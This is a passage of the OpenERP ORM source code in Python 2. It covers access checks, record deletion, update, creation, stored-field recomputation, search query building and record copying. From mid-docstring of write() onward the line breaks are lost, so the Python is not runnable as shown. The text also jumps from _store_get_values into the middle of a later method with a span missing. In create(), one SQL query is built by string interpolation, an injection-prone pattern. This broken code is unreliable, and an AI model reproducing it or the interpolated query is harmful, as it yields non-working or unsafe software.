                # mention the first one only to keep the error message readable
                raise except_orm('ConcurrencyException', _('A document was modified since you last viewed it (%s:%d)') % (self._description, res[0]))

    def check_access_rights(self, cr, uid, operation, raise_exception=True): # no context on purpose.
        """Verifies that the operation given by ``operation`` is allowed for the user
           according to the access rights."""
        return self.pool.get('ir.model.access').check(cr, uid, self._name, operation, raise_exception)

    def check_create(self, cr, uid, raise_exception=True):
        # Convenience wrapper around check_access_rights('create').
        return self.check_access_rights(cr, uid, 'create', raise_exception)

    def check_read(self, cr, uid, raise_exception=True):
        # Convenience wrapper around check_access_rights('read').
        return self.check_access_rights(cr, uid, 'read', raise_exception)

    def check_unlink(self, cr, uid, raise_exception=True):
        # Convenience wrapper around check_access_rights('unlink').
        return self.check_access_rights(cr, uid, 'unlink', raise_exception)

    def check_write(self, cr, uid, raise_exception=True):
        # Convenience wrapper around check_access_rights('write').
        return self.check_access_rights(cr, uid, 'write', raise_exception)

    def check_access_rule(self, cr, uid, ids, operation, context=None):
        """Verifies that the operation given by ``operation`` is allowed for the user
           according to ir.rules.

           :param operation: one of ``write``, ``unlink``
           :raise except_orm: * if current ir.rules do not permit this operation.
           :return: None if the operation is allowed
        """
        if uid == SUPERUSER_ID:
            return

        if self.is_transient():
            # Only one single implicit access rule for transient models: owner only!
            # This is ok to hardcode because we assert that TransientModels always
            # have log_access enabled and this the create_uid column is always there.
            # And even with _inherits, these fields are always present in the local
            # table too, so no need for JOINs.
            cr.execute("""SELECT distinct create_uid
                          FROM %s
                          WHERE id IN %%s""" % self._table, (tuple(ids),))
            uids = [x[0] for x in cr.fetchall()]
            if len(uids) != 1 or uids[0] != uid:
                raise except_orm(_('AccessError'), '%s access is '
                    'restricted to your own records for transient models '
                    '(except for the super-user).' % operation.capitalize())
        else:
            where_clause, where_params, tables = self.pool.get('ir.rule').domain_get(cr, uid, self._name, operation, context=context)
            if where_clause:
                where_clause = ' and ' + ' and '.join(where_clause)
                for sub_ids in cr.split_for_in_conditions(ids):
                    cr.execute('SELECT ' + self._table + '.id FROM ' + ','.join(tables) +
                               ' WHERE ' + self._table + '.id IN %s' + where_clause,
                               [sub_ids] + where_params)
                    # Missing rows mean some ids were filtered out by the rules
                    # (or already deleted) -> access error.
                    if cr.rowcount != len(sub_ids):
                        raise except_orm(_('AccessError'),
                                         _('Operation prohibited by access rules, or performed on an already deleted document (Operation: %s, Document type: %s).')
                                         % (operation, self._description))

    def unlink(self, cr, uid, ids, context=None):
        """
        Delete records with given ids

        :param cr: database cursor
        :param uid: current user id
        :param ids: id or list of ids
        :param context: (optional) context arguments, like lang, time zone
        :return: True
        :raise AccessError: * if user has no unlink rights on the requested object
                            * if user tries to bypass access rules for unlink on the requested object
        :raise UserError: if the record is default property for other records
        """
        if not ids:
            return True
        if isinstance(ids, (int, long)):
            ids = [ids]

        # Snapshot the stored function fields to recompute after deletion.
        result_store = self._store_get_values(cr, uid, ids, self._all_columns.keys(), context)

        self._check_concurrency(cr, ids, context)

        self.check_unlink(cr, uid)

        ir_property = self.pool.get('ir.property')

        # Check if the records are used as default properties.
        domain = [('res_id', '=', False),
                  ('value_reference', 'in', ['%s,%s' % (self._name, i) for i in ids]),
                 ]
        if ir_property.search(cr, uid, domain, context=context):
            raise except_orm(_('Error'), _('Unable to delete this document because it is used as a default property'))

        # Delete the records' properties.
        property_ids = ir_property.search(cr, uid, [('res_id', 'in', ['%s,%s' % (self._name, i) for i in ids])], context=context)
        ir_property.unlink(cr, uid, property_ids, context=context)

        # Drop any workflow instances attached to the records.
        wf_service = netsvc.LocalService("workflow")
        for oid in ids:
            wf_service.trg_delete(uid, self._name, oid, cr)

        self.check_access_rule(cr, uid, ids, 'unlink', context=context)
        pool_model_data = self.pool.get('ir.model.data')
        ir_values_obj = self.pool.get('ir.values')
        for sub_ids in cr.split_for_in_conditions(ids):
            cr.execute('delete from ' + self._table + ' ' \
                       'where id IN %s', (sub_ids,))

            # Removing the ir_model_data reference if the record being deleted is a record created by xml/csv file,
            # as these are not connected with real database foreign keys, and would be dangling references.
            # Note: following steps performed as admin to avoid access rights restrictions, and with no context
            #       to avoid possible side-effects during admin calls.
            # Step 1. Calling unlink of ir_model_data only for the affected IDS
            reference_ids = pool_model_data.search(cr, SUPERUSER_ID, [('res_id','in',list(sub_ids)),('model','=',self._name)])
            # Step 2. Marching towards the real deletion of referenced records
            if reference_ids:
                pool_model_data.unlink(cr, SUPERUSER_ID, reference_ids)

            # For the same reason, removing the record relevant to ir_values
            ir_value_ids = ir_values_obj.search(cr, uid,
                    ['|',('value','in',['%s,%s' % (self._name, sid) for sid in sub_ids]),'&',('res_id','in',list(sub_ids)),('model','=',self._name)],
                    context=context)
            if ir_value_ids:
                ir_values_obj.unlink(cr, uid, ir_value_ids, context=context)

        # Recompute stored function fields on other models that referenced
        # the deleted records (skipping rows that no longer exist).
        for order, object, store_ids, fields in result_store:
            if object != self._name:
                obj = self.pool.get(object)
                cr.execute('select id from '+obj._table+' where id IN %s', (tuple(store_ids),))
                rids = map(lambda x: x[0], cr.fetchall())
                if rids:
                    obj._store_set_values(cr, uid, rids, fields, context)

        return True

    #
    # TODO: Validate
    #
    def write(self, cr, user, ids, vals, context=None):
        """
        Update records with given ids with the given field values

        :param cr: database cursor
        :param user: current user id
        :type user: integer
        :param ids: object id or list of object ids to update according to **vals**
        :param vals: field values to update, e.g {'field_name': new_field_value, ...}
        :type vals: dictionary
        :param context: (optional) context arguments, e.g. {'lang': 'en_us', 'tz': 'UTC', ...}
        :type context: dictionary
        :return: True
        :raise AccessError: * if user has no write rights on the requested object
                            * if user tries to bypass access rules for write on the requested object
        :raise ValidateError: if user tries to enter invalid value for a field that is not in selection
        :raise UserError: if a loop would be created in a hierarchy of objects a result of the operation (such as setting an object as its own parent)

        **Note**: The type of field values to pass in ``vals`` for relationship fields is specific:

            + For a many2many field, a list of tuples is expected.
Here is the list of tuple that are accepted, with the corresponding semantics :: (0, 0, { values }) link to a new record that needs to be created with the given values dictionary (1, ID, { values }) update the linked record with id = ID (write *values* on it) (2, ID) remove and delete the linked record with id = ID (calls unlink on ID, that will delete the object completely, and the link to it as well) (3, ID) cut the link to the linked record with id = ID (delete the relationship between the two objects but does not delete the target object itself) (4, ID) link to existing record with id = ID (adds a relationship) (5) unlink all (like using (3,ID) for all linked records) (6, 0, [IDs]) replace the list of linked IDs (like using (5) then (4,ID) for each ID in the list of IDs) Example: [(6, 0, [8, 5, 6, 4])] sets the many2many to ids [8, 5, 6, 4] + For a one2many field, a lits of tuples is expected. Here is the list of tuple that are accepted, with the corresponding semantics :: (0, 0, { values }) link to a new record that needs to be created with the given values dictionary (1, ID, { values }) update the linked record with id = ID (write *values* on it) (2, ID) remove and delete the linked record with id = ID (calls unlink on ID, that will delete the object completely, and the link to it as well) Example: [(0, 0, {'field_name':field_value_record1, ...}), (0, 0, {'field_name':field_value_record2, ...})] + For a many2one field, simply use the ID of target record, which must already exist, or ``False`` to remove the link. 
+ For a reference field, use a string with the model name, a comma, and the target object id (example: ``'product.product, 5'``) """ readonly = None for field in vals.copy(): fobj = None if field in self._columns: fobj = self._columns[field] elif field in self._inherit_fields: fobj = self._inherit_fields[field][2] if not fobj: continue groups = fobj.write if groups: edit = False for group in groups: module = group.split(".")[0] grp = group.split(".")[1] cr.execute("select count(*) from res_groups_users_rel where gid IN (select res_id from ir_model_data where name=%s and module=%s and model=%s) and uid=%s", \ (grp, module, 'res.groups', user)) readonly = cr.fetchall() if readonly[0][0] >= 1: edit = True break if not edit: vals.pop(field) if not context: context = {} if not ids: return True if isinstance(ids, (int, long)): ids = [ids] self._check_concurrency(cr, ids, context) self.check_write(cr, user) result = self._store_get_values(cr, user, ids, vals.keys(), context) or [] # No direct update of parent_left/right vals.pop('parent_left', None) vals.pop('parent_right', None) parents_changed = [] parent_order = self._parent_order or self._order if self._parent_store and (self._parent_name in vals): # The parent_left/right computation may take up to # 5 seconds. No need to recompute the values if the # parent is the same. # Note: to respect parent_order, nodes must be processed in # order, so ``parents_changed`` must be ordered properly. 
parent_val = vals[self._parent_name] if parent_val: query = "SELECT id FROM %s WHERE id IN %%s AND (%s != %%s OR %s IS NULL) ORDER BY %s" % \ (self._table, self._parent_name, self._parent_name, parent_order) cr.execute(query, (tuple(ids), parent_val)) else: query = "SELECT id FROM %s WHERE id IN %%s AND (%s IS NOT NULL) ORDER BY %s" % \ (self._table, self._parent_name, parent_order) cr.execute(query, (tuple(ids),)) parents_changed = map(operator.itemgetter(0), cr.fetchall()) upd0 = [] upd1 = [] upd_todo = [] updend = [] direct = [] totranslate = context.get('lang', False) and (context['lang'] != 'en_US') for field in vals: if field in self._columns: if self._columns[field]._classic_write and not (hasattr(self._columns[field], '_fnct_inv')): if (not totranslate) or not self._columns[field].translate: upd0.append('"'+field+'"='+self._columns[field]._symbol_set[0]) upd1.append(self._columns[field]._symbol_set[1](vals[field])) direct.append(field) else: upd_todo.append(field) else: updend.append(field) if field in self._columns \ and hasattr(self._columns[field], 'selection') \ and vals[field]: self._check_selection_field_value(cr, user, field, vals[field], context=context) if self._log_access: upd0.append('write_uid=%s') upd0.append("write_date=(now() at time zone 'UTC')") upd1.append(user) if len(upd0): self.check_access_rule(cr, user, ids, 'write', context=context) for sub_ids in cr.split_for_in_conditions(ids): cr.execute('update ' + self._table + ' set ' + ','.join(upd0) + ' ' \ 'where id IN %s', upd1 + [sub_ids]) if cr.rowcount != len(sub_ids): raise except_orm(_('AccessError'), _('One of the records you are trying to modify has already been deleted (Document type: %s).') % self._description) if totranslate: # TODO: optimize for f in direct: if self._columns[f].translate: src_trans = self.pool.get(self._name).read(cr, user, ids, [f])[0][f] if not src_trans: src_trans = vals[f] # Inserting value to DB self.write(cr, user, ids, {f: vals[f]}) 
self.pool.get('ir.translation')._set_ids(cr, user, self._name+','+f, 'model', context['lang'], ids, vals[f], src_trans) # call the 'set' method of fields which are not classic_write upd_todo.sort(lambda x, y: self._columns[x].priority-self._columns[y].priority) # default element in context must be removed when call a one2many or many2many rel_context = context.copy() for c in context.items(): if c[0].startswith('default_'): del rel_context[c[0]] for field in upd_todo: for id in ids: result += self._columns[field].set(cr, self, id, field, vals[field], user, context=rel_context) or [] unknown_fields = updend[:] for table in self._inherits: col = self._inherits[table] nids = [] for sub_ids in cr.split_for_in_conditions(ids): cr.execute('select distinct "'+col+'" from "'+self._table+'" ' \ 'where id IN %s', (sub_ids,)) nids.extend([x[0] for x in cr.fetchall()]) v = {} for val in updend: if self._inherit_fields[val][0] == table: v[val] = vals[val] unknown_fields.remove(val) if v: self.pool.get(table).write(cr, user, nids, v, context) if unknown_fields: _logger.warning( 'No such field(s) in model %s: %s.', self._name, ', '.join(unknown_fields)) self._validate(cr, user, ids, context) # TODO: use _order to set dest at the right position and not first node of parent # We can't defer parent_store computation because the stored function # fields that are computer may refer (directly or indirectly) to # parent_left/right (via a child_of domain) if parents_changed: if self.pool._init: self.pool._init_parent[self._name] = True else: order = self._parent_order or self._order parent_val = vals[self._parent_name] if parent_val: clause, params = '%s=%%s' % (self._parent_name,), (parent_val,) else: clause, params = '%s IS NULL' % (self._parent_name,), () for id in parents_changed: cr.execute('SELECT parent_left, parent_right FROM %s WHERE id=%%s' % (self._table,), (id,)) pleft, pright = cr.fetchone() distance = pright - pleft + 1 # Positions of current siblings, to locate proper 
insertion point; # this can _not_ be fetched outside the loop, as it needs to be refreshed # after each update, in case several nodes are sequentially inserted one # next to the other (i.e computed incrementally) cr.execute('SELECT parent_right, id FROM %s WHERE %s ORDER BY %s' % (self._table, clause, parent_order), params) parents = cr.fetchall() # Find Position of the element position = None for (parent_pright, parent_id) in parents: if parent_id == id: break position = parent_pright + 1 # It's the first node of the parent if not position: if not parent_val: position = 1 else: cr.execute('select parent_left from '+self._table+' where id=%s', (parent_val,)) position = cr.fetchone()[0] + 1 if pleft < position <= pright: raise except_orm(_('UserError'), _('Recursivity Detected.')) if pleft < position: cr.execute('update '+self._table+' set parent_left=parent_left+%s where parent_left>=%s', (distance, position)) cr.execute('update '+self._table+' set parent_right=parent_right+%s where parent_right>=%s', (distance, position)) cr.execute('update '+self._table+' set parent_left=parent_left+%s, parent_right=parent_right+%s where parent_left>=%s and parent_left<%s', (position-pleft, position-pleft, pleft, pright)) else: cr.execute('update '+self._table+' set parent_left=parent_left+%s where parent_left>=%s', (distance, position)) cr.execute('update '+self._table+' set parent_right=parent_right+%s where parent_right>=%s', (distance, position)) cr.execute('update '+self._table+' set parent_left=parent_left-%s, parent_right=parent_right-%s where parent_left>=%s and parent_left<%s', (pleft-position+distance, pleft-position+distance, pleft+distance, pright+distance)) result += self._store_get_values(cr, user, ids, vals.keys(), context) result.sort() done = {} for order, object, ids_to_update, fields_to_recompute in result: key = (object, tuple(fields_to_recompute)) done.setdefault(key, {}) # avoid to do several times the same computation todo = [] for id in ids_to_update: if 
id not in done[key]: done[key][id] = True todo.append(id) self.pool.get(object)._store_set_values(cr, user, todo, fields_to_recompute, context) wf_service = netsvc.LocalService("workflow") for id in ids: wf_service.trg_write(user, self._name, id, cr) return True # # TODO: Should set perm to user.xxx # def create(self, cr, user, vals, context=None): """ Create a new record for the model. The values for the new record are initialized using the ``vals`` argument, and if necessary the result of ``default_get()``. :param cr: database cursor :param user: current user id :type user: integer :param vals: field values for new record, e.g {'field_name': field_value, ...} :type vals: dictionary :param context: optional context arguments, e.g. {'lang': 'en_us', 'tz': 'UTC', ...} :type context: dictionary :return: id of new record created :raise AccessError: * if user has no create rights on the requested object * if user tries to bypass access rules for create on the requested object :raise ValidateError: if user tries to enter invalid value for a field that is not in selection :raise UserError: if a loop would be created in a hierarchy of objects a result of the operation (such as setting an object as its own parent) **Note**: The type of field values to pass in ``vals`` for relationship fields is specific. Please see the description of the :py:meth:`~osv.osv.osv.write` method for details about the possible values and how to specify them. 
""" if not context: context = {} if self.is_transient(): self._transient_vacuum(cr, user) self.check_create(cr, user) vals = self._add_missing_default_values(cr, user, vals, context) tocreate = {} for v in self._inherits: if self._inherits[v] not in vals: tocreate[v] = {} else: tocreate[v] = {'id': vals[self._inherits[v]]} (upd0, upd1, upd2) = ('', '', []) upd_todo = [] unknown_fields = [] for v in vals.keys(): if v in self._inherit_fields and v not in self._columns: (table, col, col_detail, original_parent) = self._inherit_fields[v] tocreate[table][v] = vals[v] del vals[v] else: if (v not in self._inherit_fields) and (v not in self._columns): del vals[v] unknown_fields.append(v) if unknown_fields: _logger.warning( 'No such field(s) in model %s: %s.', self._name, ', '.join(unknown_fields)) # Try-except added to filter the creation of those records whose filds are readonly. # Example : any dashboard which has all the fields readonly.(due to Views(database views)) try: cr.execute("SELECT nextval('"+self._sequence+"')") except: raise except_orm(_('UserError'), _('You cannot perform this operation. New Record Creation is not allowed for this object as this object is for reporting purpose.')) id_new = cr.fetchone()[0] for table in tocreate: if self._inherits[table] in vals: del vals[self._inherits[table]] record_id = tocreate[table].pop('id', None) # When linking/creating parent records, force context without 'no_store_function' key that # defers stored functions computing, as these won't be computed in batch at the end of create(). 
parent_context = dict(context) parent_context.pop('no_store_function', None) if record_id is None or not record_id: record_id = self.pool.get(table).create(cr, user, tocreate[table], context=parent_context) else: self.pool.get(table).write(cr, user, [record_id], tocreate[table], context=parent_context) upd0 += ',' + self._inherits[table] upd1 += ',%s' upd2.append(record_id) #Start : Set bool fields to be False if they are not touched(to make search more powerful) bool_fields = [x for x in self._columns.keys() if self._columns[x]._type=='boolean'] for bool_field in bool_fields: if bool_field not in vals: vals[bool_field] = False #End for field in vals.copy(): fobj = None if field in self._columns: fobj = self._columns[field] else: fobj = self._inherit_fields[field][2] if not fobj: continue groups = fobj.write if groups: edit = False for group in groups: module = group.split(".")[0] grp = group.split(".")[1] cr.execute("select count(*) from res_groups_users_rel where gid IN (select res_id from ir_model_data where name='%s' and module='%s' and model='%s') and uid=%s" % \ (grp, module, 'res.groups', user)) readonly = cr.fetchall() if readonly[0][0] >= 1: edit = True break elif readonly[0][0] == 0: edit = False else: edit = False if not edit: vals.pop(field) for field in vals: if self._columns[field]._classic_write: upd0 = upd0 + ',"' + field + '"' upd1 = upd1 + ',' + self._columns[field]._symbol_set[0] upd2.append(self._columns[field]._symbol_set[1](vals[field])) else: if not isinstance(self._columns[field], fields.related): upd_todo.append(field) if field in self._columns \ and hasattr(self._columns[field], 'selection') \ and vals[field]: self._check_selection_field_value(cr, user, field, vals[field], context=context) if self._log_access: upd0 += ',create_uid,create_date' upd1 += ",%s,(now() at time zone 'UTC')" upd2.append(user) cr.execute('insert into "'+self._table+'" (id'+upd0+") values ("+str(id_new)+upd1+')', tuple(upd2)) self.check_access_rule(cr, user, 
[id_new], 'create', context=context) upd_todo.sort(lambda x, y: self._columns[x].priority-self._columns[y].priority) if self._parent_store and not context.get('defer_parent_store_computation'): if self.pool._init: self.pool._init_parent[self._name] = True else: parent = vals.get(self._parent_name, False) if parent: cr.execute('select parent_right from '+self._table+' where '+self._parent_name+'=%s order by '+(self._parent_order or self._order), (parent,)) pleft_old = None result_p = cr.fetchall() for (pleft,) in result_p: if not pleft: break pleft_old = pleft if not pleft_old: cr.execute('select parent_left from '+self._table+' where id=%s', (parent,)) pleft_old = cr.fetchone()[0] pleft = pleft_old else: cr.execute('select max(parent_right) from '+self._table) pleft = cr.fetchone()[0] or 0 cr.execute('update '+self._table+' set parent_left=parent_left+2 where parent_left>%s', (pleft,)) cr.execute('update '+self._table+' set parent_right=parent_right+2 where parent_right>%s', (pleft,)) cr.execute('update '+self._table+' set parent_left=%s,parent_right=%s where id=%s', (pleft+1, pleft+2, id_new)) # default element in context must be remove when call a one2many or many2many rel_context = context.copy() for c in context.items(): if c[0].startswith('default_'): del rel_context[c[0]] result = [] for field in upd_todo: result += self._columns[field].set(cr, self, id_new, field, vals[field], user, rel_context) or [] self._validate(cr, user, [id_new], context) if not context.get('no_store_function', False): result += self._store_get_values(cr, user, [id_new], vals.keys(), context) result.sort() done = [] for order, object, ids, fields2 in result: if not (object, ids, fields2) in done: self.pool.get(object)._store_set_values(cr, user, ids, fields2, context) done.append((object, ids, fields2)) if self._log_create and not (context and context.get('no_store_function', False)): message = self._description + \ " '" + \ self.name_get(cr, user, [id_new], context=context)[0][1] + \ 
"' " + _("created.") self.log(cr, user, id_new, message, True, context=context) wf_service = netsvc.LocalService("workflow") wf_service.trg_create(user, self._name, id_new, cr) return id_new def browse(self, cr, uid, select, context=None, list_class=None, fields_process=None): """Fetch records as objects allowing to use dot notation to browse fields and relations :param cr: database cursor :param uid: current user id :param select: id or list of ids. :param context: context arguments, like lang, time zone :rtype: object or list of objects requested """ self._list_class = list_class or browse_record_list cache = {} # need to accepts ints and longs because ids coming from a method # launched by button in the interface have a type long... if isinstance(select, (int, long)): return browse_record(cr, uid, select, self, cache, context=context, list_class=self._list_class, fields_process=fields_process) elif isinstance(select, list): return self._list_class([browse_record(cr, uid, id, self, cache, context=context, list_class=self._list_class, fields_process=fields_process) for id in select], context=context) else: return browse_null() def _store_get_values(self, cr, uid, ids, fields, context): """Returns an ordered list of fields.functions to call due to an update operation on ``fields`` of records with ``ids``, obtained by calling the 'store' functions of these fields, as setup by their 'store' attribute. :return: [(priority, model_name, [record_ids,], [function_fields,])] """ if fields is None: fields = [] stored_functions = self.pool._store_function.get(self._name, []) # use indexed names for the details of the stored_functions: model_name_, func_field_to_compute_, id_mapping_fnct_, trigger_fields_, priority_ = range(5) # only keep functions that should be triggered for the ``fields`` # being written to. 
    def _store_get_values(self, cr, uid, ids, fields, context):
        """Returns an ordered list of fields.functions to call due to
           an update operation on ``fields`` of records with ``ids``,
           obtained by calling the 'store' functions of these fields,
           as setup by their 'store' attribute.

           :return: [(priority, model_name, [record_ids,], [function_fields,])]
        """
        if fields is None: fields = []
        stored_functions = self.pool._store_function.get(self._name, [])

        # use indexed names for the details of the stored_functions:
        model_name_, func_field_to_compute_, id_mapping_fnct_, trigger_fields_, priority_ = range(5)

        # only keep functions that should be triggered for the ``fields``
        # being written to.
        to_compute = [f for f in stored_functions \
                if ((not f[trigger_fields_]) or set(fields).intersection(f[trigger_fields_]))]

        mapping = {}
        for function in to_compute:
            # use admin user for accessing objects having rules defined on store fields
            target_ids = [id for id in function[id_mapping_fnct_](self, cr, SUPERUSER_ID, ids, context) if id]

            # the compound key must consider the priority and model name
            key = (function[priority_], function[model_name_])
            for target_id in target_ids:
                mapping.setdefault(key, {}).setdefault(target_id,set()).add(tuple(function))

        # Here mapping looks like:
        # { (10, 'model_a') : { target_id1: [ (function_1_tuple, function_2_tuple) ], ... }
        #   (20, 'model_a') : { target_id2: [ (function_3_tuple, function_4_tuple) ], ... }
        #   (99, 'model_a') : { target_id1: [ (function_5_tuple, function_6_tuple) ], ... }
        # }

        # Now we need to generate the batch function calls list
        # call_map =
        #   { (10, 'model_a') : [(10, 'model_a', [record_ids,], [function_fields,])] }
        call_map = {}
        for ((priority,model), id_map) in mapping.iteritems():
            # group the target ids by the exact set of functions they need,
            # so each distinct function-set is computed once per batch of ids
            functions_ids_maps = {}
            # function_ids_maps =
            # { (function_1_tuple, function_2_tuple) : [target_id1, target_id2, ..] }
            for id, functions in id_map.iteritems():
                functions_ids_maps.setdefault(tuple(functions), []).append(id)
            for functions, ids in functions_ids_maps.iteritems():
                call_map.setdefault((priority,model),[]).append((priority, model, ids,
                                                                [f[func_field_to_compute_] for f in functions]))
        # flatten the batches in (priority, model) order, so lower-priority
        # computations run first
        ordered_keys = call_map.keys()
        ordered_keys.sort()
        result = []
        if ordered_keys:
            result = reduce(operator.add, (call_map[k] for k in ordered_keys))
        return result
pass upd0.append('"'+v+'"='+self._columns[v]._symbol_set[0]) upd1.append(self._columns[v]._symbol_set[1](value[v])) upd1.append(id) if upd0 and upd1: cr.execute('update "' + self._table + '" set ' + \ ','.join(upd0) + ' where id = %s', upd1) else: for f in val: # use admin user for accessing objects having rules defined on store fields result = self._columns[f].get(cr, self, ids, f, SUPERUSER_ID, context=context) for r in result.keys(): if field_flag: if r in field_dict.keys(): if f in field_dict[r]: result.pop(r) for id, value in result.items(): if self._columns[f]._type in ('many2one', 'one2one'): try: value = value[0] except: pass cr.execute('update "' + self._table + '" set ' + \ '"'+f+'"='+self._columns[f]._symbol_set[0] + ' where id = %s', (self._columns[f]._symbol_set[1](value), id)) return True # # TODO: Validate # def perm_write(self, cr, user, ids, fields, context=None): raise NotImplementedError(_('This method does not exist anymore')) # TODO: ameliorer avec NULL def _where_calc(self, cr, user, domain, active_test=True, context=None): """Computes the WHERE clause needed to implement an OpenERP domain. :param domain: the domain to compute :type domain: list :param active_test: whether the default filtering of records with ``active`` field set to ``False`` should be applied. :return: the query expressing the given domain as provided in domain :rtype: osv.query.Query """ if not context: context = {} domain = domain[:] # if the object has a field named 'active', filter out all inactive # records unless they were explicitely asked for if 'active' in self._all_columns and (active_test and context.get('active_test', True)): if domain: # the item[0] trick below works for domain items and '&'/'|'/'!' 
# operators too if not any(item[0] == 'active' for item in domain): domain.insert(0, ('active', '=', 1)) else: domain = [('active', '=', 1)] if domain: e = expression.expression(cr, user, domain, self, context) tables = e.get_tables() where_clause, where_params = e.to_sql() where_clause = where_clause and [where_clause] or [] else: where_clause, where_params, tables = [], [], ['"%s"' % self._table] return Query(tables, where_clause, where_params) def _check_qorder(self, word): if not regex_order.match(word): raise except_orm(_('AccessError'), _('Invalid "order" specified. A valid "order" specification is a comma-separated list of valid field names (optionally followed by asc/desc for the direction)')) return True def _apply_ir_rules(self, cr, uid, query, mode='read', context=None): """Add what's missing in ``query`` to implement all appropriate ir.rules (using the ``model_name``'s rules or the current model's rules if ``model_name`` is None) :param query: the current query object """ def apply_rule(added_clause, added_params, added_tables, parent_model=None, child_object=None): if added_clause: if parent_model and child_object: # as inherited rules are being applied, we need to add the missing JOIN # to reach the parent table (if it was not JOINed yet in the query) child_object._inherits_join_add(child_object, parent_model, query) query.where_clause += added_clause query.where_clause_params += added_params for table in added_tables: if table not in query.tables: query.tables.append(table) return True return False # apply main rules on the object rule_obj = self.pool.get('ir.rule') apply_rule(*rule_obj.domain_get(cr, uid, self._name, mode, context=context)) # apply ir.rules from the parents (through _inherits) for inherited_model in self._inherits: kwargs = dict(parent_model=inherited_model, child_object=self) #workaround for python2.5 apply_rule(*rule_obj.domain_get(cr, uid, inherited_model, mode, context=context), **kwargs) def _generate_m2o_order_by(self, 
order_field, query): """ Add possibly missing JOIN to ``query`` and generate the ORDER BY clause for m2o fields, either native m2o fields or function/related fields that are stored, including intermediate JOINs for inheritance if required. :return: the qualified field name to use in an ORDER BY clause to sort by ``order_field`` """ if order_field not in self._columns and order_field in self._inherit_fields: # also add missing joins for reaching the table containing the m2o field qualified_field = self._inherits_join_calc(order_field, query) order_field_column = self._inherit_fields[order_field][2] else: qualified_field = '"%s"."%s"' % (self._table, order_field) order_field_column = self._columns[order_field] assert order_field_column._type == 'many2one', 'Invalid field passed to _generate_m2o_order_by()' if not order_field_column._classic_write and not getattr(order_field_column, 'store', False): _logger.debug("Many2one function/related fields must be stored " \ "to be used as ordering fields! Ignoring sorting for %s.%s", self._name, order_field) return # figure out the applicable order_by for the m2o dest_model = self.pool.get(order_field_column._obj) m2o_order = dest_model._order if not regex_order.match(m2o_order): # _order is complex, can't use it here, so we default to _rec_name m2o_order = dest_model._rec_name else: # extract the field names, to be able to qualify them and add desc/asc m2o_order_list = [] for order_part in m2o_order.split(","): m2o_order_list.append(order_part.strip().split(" ",1)[0].strip()) m2o_order = m2o_order_list # Join the dest m2o table if it's not joined yet. 
We use [LEFT] OUTER join here # as we don't want to exclude results that have NULL values for the m2o src_table, src_field = qualified_field.replace('"','').split('.', 1) query.join((src_table, dest_model._table, src_field, 'id'), outer=True) qualify = lambda field: '"%s"."%s"' % (dest_model._table, field) return map(qualify, m2o_order) if isinstance(m2o_order, list) else qualify(m2o_order) def _generate_order_by(self, order_spec, query): """ Attempt to consruct an appropriate ORDER BY clause based on order_spec, which must be a comma-separated list of valid field names, optionally followed by an ASC or DESC direction. :raise" except_orm in case order_spec is malformed """ order_by_clause = self._order if order_spec: order_by_elements = [] self._check_qorder(order_spec) for order_part in order_spec.split(','): order_split = order_part.strip().split(' ') order_field = order_split[0].strip() order_direction = order_split[1].strip() if len(order_split) == 2 else '' inner_clause = None if order_field == 'id': order_by_clause = '"%s"."%s"' % (self._table, order_field) elif order_field in self._columns: order_column = self._columns[order_field] if order_column._classic_read: inner_clause = '"%s"."%s"' % (self._table, order_field) elif order_column._type == 'many2one': inner_clause = self._generate_m2o_order_by(order_field, query) else: continue # ignore non-readable or "non-joinable" fields elif order_field in self._inherit_fields: parent_obj = self.pool.get(self._inherit_fields[order_field][3]) order_column = parent_obj._columns[order_field] if order_column._classic_read: inner_clause = self._inherits_join_calc(order_field, query) elif order_column._type == 'many2one': inner_clause = self._generate_m2o_order_by(order_field, query) else: continue # ignore non-readable or "non-joinable" fields if inner_clause: if isinstance(inner_clause, list): for clause in inner_clause: order_by_elements.append("%s %s" % (clause, order_direction)) else: order_by_elements.append("%s %s" 
% (inner_clause, order_direction)) if order_by_elements: order_by_clause = ",".join(order_by_elements) return order_by_clause and (' ORDER BY %s ' % order_by_clause) or '' def _search(self, cr, user, args, offset=0, limit=None, order=None, context=None, count=False, access_rights_uid=None): """ Private implementation of search() method, allowing specifying the uid to use for the access right check. This is useful for example when filling in the selection list for a drop-down and avoiding access rights errors, by specifying ``access_rights_uid=1`` to bypass access rights check, but not ir.rules! This is ok at the security level because this method is private and not callable through XML-RPC. :param access_rights_uid: optional user ID to use when checking access rights (not for ir.rules, this is only for ir.model.access) """ if context is None: context = {} self.check_read(cr, access_rights_uid or user) # For transient models, restrict acces to the current user, except for the super-user if self.is_transient() and self._log_access and user != SUPERUSER_ID: args = expression.AND(([('create_uid', '=', user)], args or [])) query = self._where_calc(cr, user, args, context=context) self._apply_ir_rules(cr, user, query, 'read', context=context) order_by = self._generate_order_by(order, query) from_clause, where_clause, where_clause_params = query.get_sql() limit_str = limit and ' limit %d' % limit or '' offset_str = offset and ' offset %d' % offset or '' where_str = where_clause and (" WHERE %s" % where_clause) or '' if count: cr.execute('SELECT count("%s".id) FROM ' % self._table + from_clause + where_str + limit_str + offset_str, where_clause_params) res = cr.fetchall() return res[0][0] cr.execute('SELECT "%s".id FROM ' % self._table + from_clause + where_str + order_by + limit_str + offset_str, where_clause_params) res = cr.fetchall() return [x[0] for x in res] # returns the different values ever entered for one field # this is used, for example, in the client when the 
user hits enter on # a char field def distinct_field_get(self, cr, uid, field, value, args=None, offset=0, limit=None): if not args: args = [] if field in self._inherit_fields: return self.pool.get(self._inherit_fields[field][0]).distinct_field_get(cr, uid, field, value, args, offset, limit) else: return self._columns[field].search(cr, self, args, field, value, offset, limit, uid) def copy_data(self, cr, uid, id, default=None, context=None): """ Copy given record's data with all its fields values :param cr: database cursor :param user: current user id :param id: id of the record to copy :param default: field values to override in the original values of the copied record :type default: dictionary :param context: context arguments, like lang, time zone :type context: dictionary :return: dictionary containing all the field values """ if context is None: context = {} # avoid recursion through already copied records in case of circular relationship seen_map = context.setdefault('__copy_data_seen',{}) if id in seen_map.setdefault(self._name,[]): return seen_map[self._name].append(id) if default is None: default = {} if 'state' not in default: if 'state' in self._defaults: if callable(self._defaults['state']): default['state'] = self._defaults['state'](self, cr, uid, context) else: default['state'] = self._defaults['state'] context_wo_lang = context.copy() if 'lang' in context: del context_wo_lang['lang'] data = self.read(cr, uid, [id,], context=context_wo_lang) if data: data = data[0] else: raise IndexError( _("Record #%d of %s not found, cannot copy!") %( id, self._name)) # TODO it seems fields_get can be replaced by _all_columns (no need for translation) fields = self.fields_get(cr, uid, context=context) for f in fields: ftype = fields[f]['type'] if self._log_access and f in LOG_ACCESS_COLUMNS: del data[f] if f in 